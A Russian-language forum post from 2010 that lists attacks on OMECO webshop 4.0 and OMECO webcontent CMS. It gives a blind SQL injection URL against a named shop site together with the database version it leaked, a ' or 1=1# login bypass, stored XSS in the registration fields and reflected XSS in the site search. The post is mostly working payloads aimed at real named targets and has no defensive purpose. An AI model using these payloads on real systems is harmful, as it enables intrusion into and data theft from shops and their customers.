Показать сообщение отдельно

  #4  
Старый 25.10.2010, 19:24
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

OMECO®webshop 4.0



BLIND SQL INJECTION

Пример:

Цитата:
Сообщение от None  
http://shop.omeco.de/item/23/0/0/26/index.omeco?PHPSESSID=5aa879eab916e4eaee5d119db59b 8e88&ARTICLEID=26 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--&COMEFROM=&EVENT=item&ACT=insert&MENGE=1&insertbut ton=Bestellen
Result:

Код:
Duplicate entry '4.1.221' for key 1



SQL INJECTION AUTHORIZATION BYPASS


Цитата:
Сообщение от None  
http://shop.omeco.de/index.omeco?EVENT=showCustomer&scriptMode=order&PH PSESSID=5aa879eab916e4eaee5d119db59b8e88
Ihr Login: ' or 1=1# 1

Passwort: ' or 1=1# 1



Активная xss


При регистрации почти все поля уязвимы

вписуем

Код:
document.body.innerHTML ="body{ visibility:hidden; }
или что-то другое

OMECO®webcontent CMS

Пассивная xss:

http://www.omeco.de/

В Поиске: ">alert(xss)
 
Ответить с цитированием